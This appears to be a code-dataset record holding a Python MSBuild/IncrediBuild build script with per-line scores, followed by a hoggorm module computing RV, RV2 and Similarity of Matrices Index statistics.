ConsoleColor.Red) exit(1) else: IncrediBuild = GetIncrediBuildPath() if not IncrediBuild: Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red) exit(1) cwd = os.getcwd() Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType)) ret = main() end_time = time.time() cost_time = end_time-start_time Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green) exit(ret)
[ "#!python3\n", "# -*- coding:utf-8 -*-\n", "import os\n", "import sys\n", "import time\n", "import ctypes\n", "import shutil\n", "import subprocess\n", "IsPy3 = sys.version_info[0] >= 3\n", "if IsPy3:\n", " import winreg\n", "else:\n", " import codecs\n", " import _winreg as winreg\n", "\n", "BuildType = 'Release'\n", "IsRebuild = True\n", "Build = 'Rebuild'\n", "Update = False\n", "Copy = False\n", "CleanAll = False\n", "BuildTimeout = 30*60\n", "Bit = 'Win32'\n", "Dlllib = 'dll'\n", "MSBuild = None\n", "IncrediBuild = None\n", "UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译\n", "\n", "#不同项目只需修改下面5个变量\n", "SlnFile = '../ReadWriteMutex.sln' #相对于本py脚本路径的相对路径\n", "UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新\n", "ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行\n", "MSBuildFirstProjects = [r'ReadWriteMutex'] #使用MSBuild需要工程文件在解决方案sln中的路径\n", " # MSBuild首先编译的项目,填空不指定顺序\n", "IncrediBuildFirstProjects = ['ReadWriteMutex'] #使用IncrediBuild只需工程名字\n", " #IncrediBuild首先编译的项目,填空不指定顺序\n", "\n", "class ConsoleColor():\n", " '''This class defines the values of color for printing on console window'''\n", " Black = 0\n", " DarkBlue = 1\n", " DarkGreen = 2\n", " DarkCyan = 3\n", " DarkRed = 4\n", " DarkMagenta = 5\n", " DarkYellow = 6\n", " Gray = 7\n", " DarkGray = 8\n", " Blue = 9\n", " Green = 10\n", " Cyan = 11\n", " Red = 12\n", " Magenta = 13\n", " Yellow = 14\n", " White = 15\n", "\n", "class Coord(ctypes.Structure):\n", " _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)]\n", "\n", "class SmallRect(ctypes.Structure):\n", " _fields_ = [('Left', ctypes.c_short),\n", " ('Top', ctypes.c_short),\n", " ('Right', ctypes.c_short),\n", " ('Bottom', ctypes.c_short),\n", " ]\n", "\n", "class ConsoleScreenBufferInfo(ctypes.Structure):\n", " _fields_ = [('dwSize', Coord),\n", " ('dwCursorPosition', Coord),\n", " ('wAttributes', ctypes.c_uint),\n", " ('srWindow', SmallRect),\n", " ('dwMaximumWindowSize', Coord),\n", " ]\n", "\n", "class Win32API():\n", " 
'''Some native methods for python calling'''\n", " StdOutputHandle = -11\n", " ConsoleOutputHandle = None\n", " DefaultColor = None\n", "\n", " @staticmethod\n", " def SetConsoleColor(color):\n", " '''Change the text color on console window'''\n", " if not Win32API.DefaultColor:\n", " if not Win32API.ConsoleOutputHandle:\n", " Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle)\n", " bufferInfo = ConsoleScreenBufferInfo()\n", " ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo))\n", " Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF)\n", " if IsPy3:\n", " sys.stdout.flush() # need flush stdout in python 3\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color)\n", "\n", " @staticmethod\n", " def ResetConsoleColor():\n", " '''Reset the default text color on console window'''\n", " if IsPy3:\n", " sys.stdout.flush() # need flush stdout in python 3\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor)\n", "\n", "class Logger():\n", " LogFile = '@AutomationLog.txt'\n", " LineSep = '\\n'\n", " @staticmethod\n", " def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " if printToStdout:\n", " isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White)\n", " if isValidColor:\n", " Win32API.SetConsoleColor(consoleColor)\n", " try:\n", " sys.stdout.write(log)\n", " except UnicodeError as e:\n", " Win32API.SetConsoleColor(ConsoleColor.Red)\n", " isValidColor = True\n", " sys.stdout.write(str(type(e)) + ' can\\'t print the log!\\n')\n", " if isValidColor:\n", " Win32API.ResetConsoleColor()\n", " if not writeToFile:\n", " return\n", " if IsPy3:\n", " logFile = open(Logger.LogFile, 'a+', 
encoding = 'utf-8')\n", " else:\n", " logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8')\n", " try:\n", " logFile.write(log)\n", " # logFile.flush() # need flush in python 3, otherwise log won't be saved\n", " except Exception as ex:\n", " logFile.close()\n", " sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex))\n", "\n", " @staticmethod\n", " def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout)\n", "\n", " @staticmethod\n", " def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " t = time.localtime()\n", " log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday,\n", " t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep)\n", " Logger.Write(log, consoleColor, writeToFile, printToStdout)\n", "\n", " @staticmethod\n", " def DeleteLog():\n", " if os.path.exists(Logger.LogFile):\n", " os.remove(Logger.LogFile)\n", "\n", "\n", "def GetMSBuildPath():\n", " if Bit == 'Win32':\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" x86\\nwhere msbuild'\n", " elif Bit == 'x64':\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" amd64\\nwhere msbuild'\n", " ftemp = open('GetMSBuildPath.bat', 'wt')\n", " ftemp.write(cmd)\n", " ftemp.close()\n", " p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE)\n", " p.wait()\n", " lines = p.stdout.read().decode().splitlines()\n", " os.remove('GetMSBuildPath.bat')\n", " for line in lines:\n", " if 'MSBuild.exe' in line:\n", " return line\n", "\n", "def GetIncrediBuildPath():\n", " try:\n", " 
key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\\Classes\\IncrediBuild.MonitorFile\\shell\\open\\command')\n", " value, typeId = winreg.QueryValueEx(key, '')\n", " if value:\n", " start = value.find('\"')\n", " end = value.find('\"', start + 1)\n", " path = value[start+1:end]\n", " buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe')\n", " return buildConsole\n", " except FileNotFoundError as e:\n", " Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red)\n", "\n", "def UpdateCode():\n", " # put git to path first\n", " if not shutil.which('git.exe'):\n", " Logger.Log('找不到git.exe. 请确认安装git时将git\\bin目录路径加入到环境变量path中!!!\\n, 跳过更新代码!!!', ConsoleColor.Yellow)\n", " return false\n", " oldDir = os.getcwd()\n", " for dir in UpdateDir:\n", " os.chdir(dir)\n", " ret = os.system('git pull')\n", " os.chdir(oldDir)\n", " if ret != 0:\n", " Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow)\n", " return false\n", " return True\n", "\n", "def BuildProject(cmd):\n", " for i in range(6):\n", " Logger.WriteLine(cmd, ConsoleColor.Cyan)\n", " buildFailed = True\n", " startTime = time.time()\n", " p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug\n", " if IsPy3:\n", " try:\n", " buildFailed = p.wait(BuildTimeout)\n", " except subprocess.TimeoutExpired as e:\n", " Logger.Log('{0}'.format(e), ConsoleColor.Yellow)\n", " p.kill()\n", " else:\n", " buildFailed = p.wait()\n", " if not UseMSBuild:\n", " #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断\n", " fin = open('IncrediBuild.log')\n", " for line in fin:\n", " if line.startswith('=========='):\n", " Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False)\n", " if IsPy3:\n", " start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ==========\n", " else:#为了兼容py2做的特殊处理,很恶心\n", " start = 0\n", " n2 = 0\n", " while 1:\n", " if line[start].isdigit():\n", " n2 += 1\n", " if n2 == 2:\n", " break\n", " start = 
line.find(' ', start)\n", " start += 1\n", " end = line.find(' ', start)\n", " failCount = int(line[start:end])\n", " buildFailed = failCount > 0\n", " else:\n", " Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False)\n", " fin.close()\n", " costTime = time.time() - startTime\n", " Logger.WriteLine('build cost time: {0:.1f}s\\n'.format(costTime), ConsoleColor.Green)\n", " if not buildFailed:\n", " return True\n", " return False\n", "\n", "def BuildAllProjects():\n", " buildSuccess = False\n", " cmds = []\n", " if UseMSBuild:\n", " if IsRebuild:\n", " if CleanAll:\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug'))\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release'))\n", " else:\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\n", " for project in MSBuildFirstProjects:\n", " cmds.append('{0} {1} /t:{2} /p:Configuration={3};platform={4} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType, Bit))\n", " cmds.append('{0} {1} /p:Configuration={2};platform={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType, Bit))\n", " else: #IncrediBuild\n", " if IsRebuild:\n", " if CleanAll:\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug', Bit))\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release', Bit))\n", " else:\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo 
/out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit))\n", " for project in IncrediBuildFirstProjects:\n", " cmds.append('\"{0}\" {1} /build /prj={2} /cfg=\"{3}|{4}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType, Bit))\n", " cmds.append('\"{0}\" {1} /build /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit))\n", " for cmd in cmds:\n", " buildSuccess = BuildProject(cmd)\n", " if not buildSuccess:\n", " break\n", " return buildSuccess\n", "\n", "def main():\n", " if UseMSBuild:\n", " if not os.path.exists(MSBuild):\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\n", " return 1\n", " else:\n", " if not os.path.exists(IncrediBuild):\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\n", " return 1\n", " dir = os.path.dirname(__file__)\n", " if dir:\n", " oldDir = os.getcwd()\n", " os.chdir(dir)\n", " if Update:\n", " if not UpdateCode():\n", " return 1\n", " Logger.Log('git update succeed', ConsoleColor.Green)\n", " if Copy:\n", " for bat in ExecBatList:\n", " oldBatDir = os.getcwd()\n", " batDir = os.path.dirname(bat)\n", " batName = os.path.basename(bat)\n", " if batDir:\n", " os.chdir(batDir)\n", " start = time.clock()\n", " os.system(batName)\n", " Logger.Log('run \"{}\" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green)\n", " if batDir:\n", " os.chdir(oldBatDir)\n", " buildSuccess = BuildAllProjects()\n", " if buildSuccess:\n", " Logger.Log('build succeed', ConsoleColor.Green)\n", " else:\n", " Logger.Log('build failed', ConsoleColor.Red)\n", " if dir:\n", " os.chdir(oldDir)\n", " return 0 if buildSuccess else 1\n", "\n", "if __name__ == '__main__':\n", " Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green)\n", " sys.argv = [x.lower() for x in sys.argv]\n", " start_time = time.time()\n", " if 'debug' in sys.argv:\n", " BuildType = 'Debug'\n", " if 'lib' in sys.argv:\n", " Dlllib = 'lib'\n", " SlnFile = 
'../ReadWriteMutex_lib.sln'\n", " MSBuildFirstProjects = [r'ReadWriteMutex_lib']\n", " IncrediBuildFirstProjects = ['ReadWriteMutex_lib']\n", " if '64' in sys.argv:\n", " Bit = 'x64'\n", " if 'build' in sys.argv:\n", " IsRebuild = False\n", " Build = 'Build'\n", " if 'update' in sys.argv:\n", " Update = True\n", " if 'copy' in sys.argv:\n", " Copy = True\n", " if 'clean' in sys.argv:\n", " CleanAll = True\n", " if 'incredibuild' in sys.argv:\n", " UseMSBuild = False\n", " if UseMSBuild:\n", " MSBuild = GetMSBuildPath()\n", " if not MSBuild:\n", " Logger.Log('can not find MSBuild.exe', ConsoleColor.Red)\n", " exit(1)\n", " else:\n", " IncrediBuild = GetIncrediBuildPath()\n", " if not IncrediBuild:\n", " Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)\n", " exit(1)\n", " cwd = os.getcwd()\n", " Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType))\n", " ret = main()\n", " end_time = time.time()\n", " cost_time = end_time-start_time\n", " Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green)\n", " exit(ret)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03508771929824561, 0, 0.0625, 0.0392156862745098, 0.05263157894736842, 0.030303030303030304, 0.027777777777777776, 0.06666666666666667, 0.028985507246376812, 0.08823529411764706, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.02857142857142857, 0, 0.025, 0.023809523809523808, 0.023255813953488372, 0.0625, 0, 0.02040816326530612, 0, 0.022727272727272728, 0.02127659574468085, 0.025, 0.02127659574468085, 0.0625, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0.00847457627118644, 0, 0, 0.015873015873015872, 0.010869565217391304, 0, 0, 0, 0, 0, 0.015873015873015872, 0.009259259259259259, 0, 0.0625, 0, 0, 0.05555555555555555, 0.08641975308641975, 0, 0.012195121951219513, 0, 0, 0, 0.009708737864077669, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.028985507246376812, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0.010526315789473684, 0, 0, 0.08235294117647059, 0, 0.012195121951219513, 0, 0, 0.011764705882352941, 0, 0, 0.0759493670886076, 0, 0.012195121951219513, 0, 0, 0, 0.009708737864077669, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0.011627906976744186, 0, 0, 0, 0.0273972602739726, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.01680672268907563, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0.05555555555555555, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0.030612244897959183, 0, 0.018518518518518517, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.033112582781456956, 0, 0, 0.010752688172043012, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0.005813953488372093, 0.005747126436781609, 0, 0.005747126436781609, 0, 0.00510204081632653, 0.005714285714285714, 0.08333333333333333, 0, 0, 0.0072992700729927005, 0.007194244604316547, 0, 
0.007194244604316547, 0, 0.006535947712418301, 0.007633587786259542, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008849557522123894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0.010101010101010102, 0.07692307692307693 ]
355
0.006469
false
# -*- coding: utf-8 -*- import numpy import hoggorm.statTools as st def RVcoeff(dataList): """ This function computes the RV matrix correlation coefficients between pairs of arrays. The number and order of objects (rows) for the two arrays must match. The number of variables in each array may vary. Reference: `The STATIS method`_ .. _The STATIS method: https://www.utdallas.edu/~herve/Abdi-Statis2007-pretty.pdf PARAMETERS ---------- dataList : list A list holding numpy arrays for which the RV coefficient will be computed. RETURNS ------- numpy array A numpy array holding RV coefficients for pairs of numpy arrays. The diagonal in the result array holds ones, since RV is computed on identical arrays, i.e. first array in ``dataList`` against frist array in Examples -------- >>> import hoggorm as ho >>> import numpy as np >>> >>> # Generate some random data. Note that number of rows must match across arrays >>> arr1 = np.random.rand(50, 100) >>> arr2 = np.random.rand(50, 20) >>> arr3 = np.random.rand(50, 500) >>> >>> # Center the data before computation of RV coefficients >>> arr1_cent = arr1 - np.mean(arr1, axis=0) >>> arr2_cent = arr2 - np.mean(arr2, axis=0) >>> arr3_cent = arr3 - np.mean(arr3, axis=0) >>> >>> # Compute RV matrix correlation coefficients on mean centered data >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent]) >>> array([[ 1. , 0.41751839, 0.77769025], [ 0.41751839, 1. , 0.51194496], [ 0.77769025, 0.51194496, 1. 
]]) >>> >>> # Get RV for arr1_cent and arr2_cent >>> rv_results[0, 1] 0.41751838661314689 >>> >>> # or >>> rv_results[1, 0] 0.41751838661314689 >>> >>> # Get RV for arr2_cent and arr3_cent >>> rv_results[1, 2] 0.51194496245209853 >>> >>> # or >>> rv_results[2, 1] 0.51194496245209853 """ # First compute the scalar product matrices for each data set X scalArrList = [] for arr in dataList: scalArr = numpy.dot(arr, numpy.transpose(arr)) scalArrList.append(scalArr) # Now compute the 'between study cosine matrix' C C = numpy.zeros((len(dataList), len(dataList)), float) for index, element in numpy.ndenumerate(C): nom = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[1]])) denom1 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[0]])) denom2 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[1]]), scalArrList[index[1]])) Rv = nom / numpy.sqrt(numpy.dot(denom1, denom2)) C[index[0], index[1]] = Rv return C def RV2coeff(dataList): """ This function computes the RV matrix correlation coefficients between pairs of arrays. The number and order of objects (rows) for the two arrays must match. The number of variables in each array may vary. The RV2 coefficient is a modified version of the RV coefficient with values -1 <= RV2 <= 1. RV2 is independent of object and variable size. Reference: `Matrix correlations for high-dimensional data - the modified RV-coefficient`_ .. _Matrix correlations for high-dimensional data - the modified RV-coefficient: https://academic.oup.com/bioinformatics/article/25/3/401/244239 PARAMETERS ---------- dataList : list A list holding an arbitrary number of numpy arrays for which the RV coefficient will be computed. RETURNS ------- numpy array A list holding an arbitrary number of numpy arrays for which the RV coefficient will be computed. Examples -------- >>> import hoggorm as ho >>> import numpy as np >>> >>> # Generate some random data. 
Note that number of rows must match across arrays >>> arr1 = np.random.rand(50, 100) >>> arr2 = np.random.rand(50, 20) >>> arr3 = np.random.rand(50, 500) >>> >>> # Center the data before computation of RV coefficients >>> arr1_cent = arr1 - np.mean(arr1, axis=0) >>> arr2_cent = arr2 - np.mean(arr2, axis=0) >>> arr3_cent = arr3 - np.mean(arr3, axis=0) >>> >>> # Compute RV matrix correlation coefficients on mean centered data >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent]) >>> array([[ 1. , -0.00563174, 0.04028299], [-0.00563174, 1. , 0.08733739], [ 0.04028299, 0.08733739, 1. ]]) >>> >>> # Get RV for arr1_cent and arr2_cent >>> rv_results[0, 1] -0.00563174 >>> >>> # or >>> rv_results[1, 0] -0.00563174 >>> >>> # Get RV for arr2_cent and arr3_cent >>> rv_results[1, 2] 0.08733739 >>> >>> # or >>> rv_results[2, 1] 0.08733739 """ # First compute the scalar product matrices for each data set X scalArrList = [] for arr in dataList: scalArr = numpy.dot(arr, numpy.transpose(arr)) diego = numpy.diag(numpy.diag(scalArr)) scalArrMod = scalArr - diego scalArrList.append(scalArrMod) # Now compute the 'between study cosine matrix' C C = numpy.zeros((len(dataList), len(dataList)), float) for index, element in numpy.ndenumerate(C): nom = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[1]])) denom1 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[0]])) denom2 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[1]]), scalArrList[index[1]])) Rv = nom / numpy.sqrt(denom1 * denom2) C[index[0], index[1]] = Rv return C class SMI: """ Similarity of Matrices Index (SMI) A similarity index for comparing coupled data matrices. A two-step process starts with extraction of stable subspaces using Principal Component Analysis or some other method yielding two orthonormal bases. These bases are compared using Orthogonal Projection (OP / ordinary least squares) or Procrustes Rotation (PR). 
The result is a similarity measure that can be adjusted to various data sets and contexts and which includes explorative plotting and permutation based testing of matrix subspace equality. Reference: `A similarity index for comparing coupled matrices`_ .. _A similarity index for comparing coupled matrices: https://onlinelibrary.wiley.com/doi/abs/10.1002/cem.3049 PARAMETERS ---------- X1 : numpy array first matrix to be compared. X2 : numpy array second matrix to be compared. ncomp1 : int, optional maximum number of subspace components from the first matrix. ncomp2 : int, optional maximum number of subspace components from the second matrix. projection : list, optional type of projection to apply, defaults to "Orthogonal", alternatively "Procrustes". Scores1 : numpy array, optional user supplied score-matrix to replace singular value decomposition of first matrix. Scores2 : numpy array, optional user supplied score-matrix to replace singular value decomposition of second matrix. RETURNS ------- An SMI object containing all combinations of components. 
EXAMPLES -------- >>> import numpy as np >>> import hoggorm as ho >>> X1 = ho.center(np.random.rand(100, 300)) >>> U, s, V = np.linalg.svd(X1, 0) >>> X2 = np.dot(np.dot(np.delete(U, 2, 1), np.diag(np.delete(s, 2))), np.delete(V, 2, 0)) >>> smiOP = ho.SMI(X1, X2, ncomp1=10, ncomp2=10) >>> smiPR = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, projection="Procrustes") >>> smiCustom = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, Scores1=U) >>> print(smiOP.smi) >>> print(smiOP.significance()) >>> print(smiPR.significance(B=100)) """ def __init__(self, X1, X2, **kargs): # Check dimensions assert numpy.shape(X1)[0] == numpy.shape(X2)[0], ValueError( "Number of objects must be equal in X1 and X2") # Check number of components against rank rank1 = st.matrixRank(X1) rank2 = st.matrixRank(X2) if "ncomp1" not in kargs.keys(): self.ncomp1 = rank1 else: self.ncomp1 = kargs["ncomp1"] if "ncomp2" not in kargs.keys(): self.ncomp2 = rank2 else: self.ncomp2 = kargs["ncomp2"] assert self.ncomp1 <= rank1, ValueError( "Number of components for X1 cannot be higher than the rank of X1") assert self.ncomp2 <= rank2, ValueError( "Number of components for X2 cannot be higher than the rank of X2") # Handle projection types if "projection" not in kargs.keys(): self.projection = "Orthogonal" else: self.projection = kargs["projection"] assert self.projection in [ "Orthogonal", "Procrustes" ], ValueError("Unknown projection, should be Orthogonal or Procrustes") # Calculate scores if needed if "Scores1" not in kargs.keys(): Scores1, s, V = numpy.linalg.svd(X1 - numpy.mean(X1, axis=0), 0) else: Scores1 = kargs["Scores1"] if "Scores2" not in kargs.keys(): Scores2, s, V = numpy.linalg.svd(X2 - numpy.mean(X2, axis=0), 0) else: Scores2 = kargs["Scores2"] # Compute SMI values if self.projection == "Orthogonal": self.smi = numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(Scores1[:, :self.ncomp1]), Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / (numpy.reshape( numpy.min( numpy.vstack([ 
numpy.tile(range(self.ncomp1), self.ncomp1), numpy.repeat(range(self.ncomp2), self.ncomp2), ]), 0, ), [self.ncomp1, self.ncomp2], ) + 1) else: # Procrustes self.smi = numpy.zeros([self.ncomp1, self.ncomp2]) TU = numpy.dot( numpy.transpose(Scores1[:, 0:self.ncomp1]), Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) self.smi[p, q] = numpy.square(numpy.mean(s)) # Recover wrong calculations (due to numerics) self.smi[self.smi > 1] = 1 self.smi[self.smi < 0] = 0 self.N = numpy.shape(Scores1)[0] self.Scores1 = Scores1 self.Scores2 = Scores2 def significance(self, **kargs): """ Significance estimation for Similarity of Matrices Index (SMI) For each combination of components significance is estimated by sampling from a null distribution of no similarity, i.e. when the rows of one matrix is permuted B times and corresponding SMI values are computed. If the vector replicates is included, replicates will be kept together through permutations. PARAMETERS ---------- B integer : int, optional number of permutations, default = 10000. replicates : numpy array integer vector of replicates (must be balanced). RETURNS ------- An array containing P-values for all combinations of components. 
""" if "B" not in kargs.keys(): B = 10000 else: B = kargs["B"] P = numpy.zeros([self.ncomp1, self.ncomp2]) if self.projection == "Orthogonal": m = (numpy.reshape( numpy.min( numpy.vstack([ numpy.tile(range(self.ncomp1), self.ncomp1), numpy.repeat(range(self.ncomp2), self.ncomp2), ]), 0, ), [self.ncomp1, self.ncomp2], ) + 1) if "replicates" not in kargs.keys(): BScores1 = self.Scores1.copy() i = 0 while i < B: numpy.random.shuffle(BScores1) smiB = (numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(BScores1[:, :self.ncomp1]), self.Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / m) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: # With replicates AScores1 = self.Scores1.copy() BScores1 = self.Scores1.copy() i = 0 replicates = kargs["replicates"] uni = numpy.unique(replicates, return_inverse=True) vecOut = numpy.array(range(numpy.shape(uni[0])[0])) vecIn = numpy.array(range(sum(uni[1] == 0))) nOut = len(vecOut) nIn = len(vecIn) while i < B: numpy.random.shuffle( vecOut) # Permute across replicate sets for j in range(nOut): numpy.random.shuffle( vecIn) # Permute inside replicate sets BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) + vecIn, :] smiB = (numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(BScores1[:, :self.ncomp1]), self.Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / m) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: if "replicates" not in kargs.keys(): BScores1 = self.Scores1.copy() i = 0 smiB = numpy.zeros([self.ncomp1, self.ncomp2]) while i < B: numpy.random.shuffle(BScores1) # Permutation of rows TU = numpy.dot( numpy.transpose(BScores1[:, 0:self.ncomp1]), self.Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) smiB[p, q] = numpy.square(numpy.mean(s)) # Increase P-value if non-significant 
permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: # With replicates AScores1 = self.Scores1.copy() BScores1 = self.Scores1.copy() i = 0 smiB = numpy.zeros([self.ncomp1, self.ncomp2]) replicates = kargs["replicates"] uni = numpy.unique(replicates, return_inverse=True) vecOut = numpy.array(range(numpy.shape(uni[0])[0])) vecIn = numpy.array(range(sum(uni[1] == 0))) nOut = len(vecOut) nIn = len(vecIn) while i < B: numpy.random.shuffle( vecOut) # Permute across replicate sets for j in range(nOut): numpy.random.shuffle( vecIn) # Permute inside replicate sets BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) + vecIn, :] TU = numpy.dot( numpy.transpose(BScores1[:, 0:self.ncomp1]), self.Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) smiB[p, q] = numpy.square(numpy.mean(s)) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 return P / B
